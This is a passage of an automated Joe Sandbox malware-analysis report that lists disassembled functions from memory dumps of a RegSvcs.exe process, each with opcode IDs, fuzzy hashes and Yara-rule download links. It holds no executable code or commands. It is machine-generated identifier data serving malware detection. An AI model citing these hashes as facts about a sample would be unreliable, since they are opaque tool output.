                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d8d5f65ad6e9ea243b45b9f3985973b80b65642e8eb9a4e3231b6d5e04f2965a
                                                                                            • Instruction ID: 79c75ca46d447b4ed2300e7cf100dba67b77b138494c7ce188de3ddc9102af67
                                                                                            • Opcode Fuzzy Hash: d8d5f65ad6e9ea243b45b9f3985973b80b65642e8eb9a4e3231b6d5e04f2965a
                                                                                            • Instruction Fuzzy Hash: B4F0203641B6951ADF726B2CB8A02D12BACA782510F1910C9ECE0A721EC57B8883C370
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FAC5ED Relevance: .0, Instructions: 31COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3f5c650044d3c4bf999332187811012d04a9ccfd88c317ab5f97d8bb4eef89cf
                                                                                            • Instruction ID: b1880963cf30a75eb18c45dd26ce785662fb26f38a04b91c6ab656effbfa20ce
                                                                                            • Opcode Fuzzy Hash: 3f5c650044d3c4bf999332187811012d04a9ccfd88c317ab5f97d8bb4eef89cf
                                                                                            • Instruction Fuzzy Hash: BBF0B8F29116909BD322DB18C148BA1B7E8AB46BB0F189526D80A87712C264CC80EAD0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FB2619 Relevance: .0, Instructions: 31COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                            • Instruction ID: c43c4bc7179ff15f149adc411d6a39fafffdba3ebe124819fec29661763ec916
                                                                                            • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                            • Instruction Fuzzy Hash: 2BE0D832300A002BD712AE5ACCC1F87776EEFC2B10F040079B5045F252CAE6DD099AA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01006030 Relevance: .0, Instructions: 29COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                            • Instruction ID: 516c6a0bb36bbb5052efc3c56dd485d8972f3b4a5a0e9aaf3054312a92e09759
                                                                                            • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                            • Instruction Fuzzy Hash: FAF08C721442049FF3228F09D840B57B7F9EB05364F01C065F6088B1A1D33AEC50CBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F70710 Relevance: .0, Instructions: 28COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                            • Instruction ID: 0c0d47911090a5c6d4f6e577159e8626e866284517c7a1144d00ed97eff4eb4d
                                                                                            • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                            • Instruction Fuzzy Hash: C3F0ED3A204395DBDB19DF19D040BE5BBA8EF55360B10409AE84A8B351EB35FD82EB81
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FA49D0 Relevance: .0, Instructions: 28COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                            • Instruction ID: e772814120855e1c41cfeaf99cb58807e7f49642a1c76b0ccccd99adbba8f85b
                                                                                            • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                            • Instruction Fuzzy Hash: 5DE09273684546ABC3212E55CC01B6676A59BD27A0F150429E1019B150DBB8EC40F798
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01044164 Relevance: .0, Instructions: 27COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f82f1890745ba05797350532c08b90bd8a8e1ead0be54799e04b8a1f34af5a35
                                                                                            • Instruction ID: 129b1aab970ebe99bb3fc14c8ee5591efd7aef272a6bf2ca23b153de9af58886
                                                                                            • Opcode Fuzzy Hash: f82f1890745ba05797350532c08b90bd8a8e1ead0be54799e04b8a1f34af5a35
                                                                                            • Instruction Fuzzy Hash: 91F065F1A265914FE7B2D72CE5D4B9577E4AB11730F1A05F5D485C7922C724DC80C650
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0101678E Relevance: .0, Instructions: 27COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                            • Instruction ID: 4983a6de58360056ca589d5acace86e56a2f2fc538afc46e05c635dec16347d0
                                                                                            • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                            • Instruction Fuzzy Hash: E2E02672A01110FBDB21A799CD02F9BBEBCEB80FA0F050054B600E70D4E5B5EE00D6D0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 010408C0 Relevance: .0, Instructions: 25COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                            • Instruction ID: 3a005a240ab20f456a021a64279f2f232dc37dead7359e5ccd138e42c3930283
                                                                                            • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                            • Instruction Fuzzy Hash: EBE02B716403458BDB208A2DC280AD3B7E8DF95620F1480BDEEC417202C230F842C6D0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F725E0 Relevance: .0, Instructions: 23COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 8f74d5c7a980b807005c19753901a1a3c04f64f15b48d7c763a3c31beb843973
                                                                                            • Instruction ID: 331ef1dee9d525797edd1c8971f48e5e47e04d2dca470100130dde2698a68e10
                                                                                            • Opcode Fuzzy Hash: 8f74d5c7a980b807005c19753901a1a3c04f64f15b48d7c763a3c31beb843973
                                                                                            • Instruction Fuzzy Hash: 9EE092721005549BC722BF29DD02F8B77EAEB94760F018516F159571A1CB39AD10D784
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0102A456 Relevance: .0, Instructions: 23COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                            • Instruction ID: 8e7e9fae5b680aee38bc402528fbeeedc63c76f611378cf53d1372928e11978e
                                                                                            • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                            • Instruction Fuzzy Hash: 1AE06D31010620DFEB766B2ADC09B92BBE0AF80711F148868F1D6128B1CB78D880DA40
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FF4000 Relevance: .0, Instructions: 22COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                            • Instruction ID: f3c2fe9cf6a59a41ee4ee1f6085cecef8709a2fa7b924a74ebd79e9f0a134183
                                                                                            • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                            • Instruction Fuzzy Hash: F2E0AE347002098BD715CF19C040B6277A6BFD5B20F28C068AA488F205EB32A8429A40
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F6823B Relevance: .0, Instructions: 21COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                            • Instruction ID: e24e98c5c608f542f0bd92e749a2a15434350310e13be3694e13130676ed7b2b
                                                                                            • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                            • Instruction Fuzzy Hash: EEE08632440510DFDB312E11DC12F9176A1FB94B60F20492DF041160658B745C82FB44
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F72050 Relevance: .0, Instructions: 20COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9dc0b9ad6201289bbbafcea8601b618ec1d6ff0d66bb2ea0f3143a5707d0fbfd
                                                                                            • Instruction ID: 18739392821e778d39ad7b848ce3e72e3d773db2bc744bd017d786fd12a0961e
                                                                                            • Opcode Fuzzy Hash: 9dc0b9ad6201289bbbafcea8601b618ec1d6ff0d66bb2ea0f3143a5707d0fbfd
                                                                                            • Instruction Fuzzy Hash: 7EE08C321004506BC311FA5DED02E8A73EAEB95760F008122F154972A1CB69AD00D794
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FA8A90 Relevance: .0, Instructions: 20COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                            • Instruction ID: bf1d91bfc5cadeb52a160d211d36f0ecfce6d25bf677d56b8113571c200cedd8
                                                                                            • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                            • Instruction Fuzzy Hash: 54E02673110A0497C328EE18C411B7273A4EF45730F08423EA51347380C934E804D794
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F72324 Relevance: .0, Instructions: 19COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1fb84a54a76b0b59f3231cdbb2d26b0abecede4783def34d10f1a66e2d715024
                                                                                            • Instruction ID: 92e3f20422471121b5aba63bbed3407e4ae37f476ff384e2a98dd3b4094661f7
                                                                                            • Opcode Fuzzy Hash: 1fb84a54a76b0b59f3231cdbb2d26b0abecede4783def34d10f1a66e2d715024
                                                                                            • Instruction Fuzzy Hash: 35E04F3190004A9FCF56EB55CA45FD9F7B2FB88320F540069E40832161CB385E54EB50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00F6A740 Relevance: .0, Instructions: 18COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3294d9e0611fd8cb7e020eb025cc7a1c6b4d32ac0b185834d9d821d574cb207a
                                                                                            • Instruction ID: 63e447c1e56cfddc4c123e1f8e2ca0bde47785ef82c176b4b886c79b94baf6a3
                                                                                            • Opcode Fuzzy Hash: 3294d9e0611fd8cb7e020eb025cc7a1c6b4d32ac0b185834d9d821d574cb207a
                                                                                            • Instruction Fuzzy Hash: FDE08C31900445EBCB16AB52CE56FA9B771BB88710F044499E00C264A2C72C9C90FBD0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FC6AA4 Relevance: .0, Instructions: 17COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                            • Instruction ID: 127826dc828ade284bd9733b831d1b6f1576dc8a1d2c45c76727c0c8903e8637
                                                                                            • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                            • Instruction Fuzzy Hash: BFD05E36511A50AFC3329F1BEE01D53BBF9FBC5F20705062EA44693920C675AC06DBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00FAE59C Relevance: .0, Instructions: 16COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.1773673335.0000000000F66000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F40000, based on PE: true
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000000F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.0000000001069000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.000000000106D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000008.00000002.1773673335.00000000010DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_f40000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
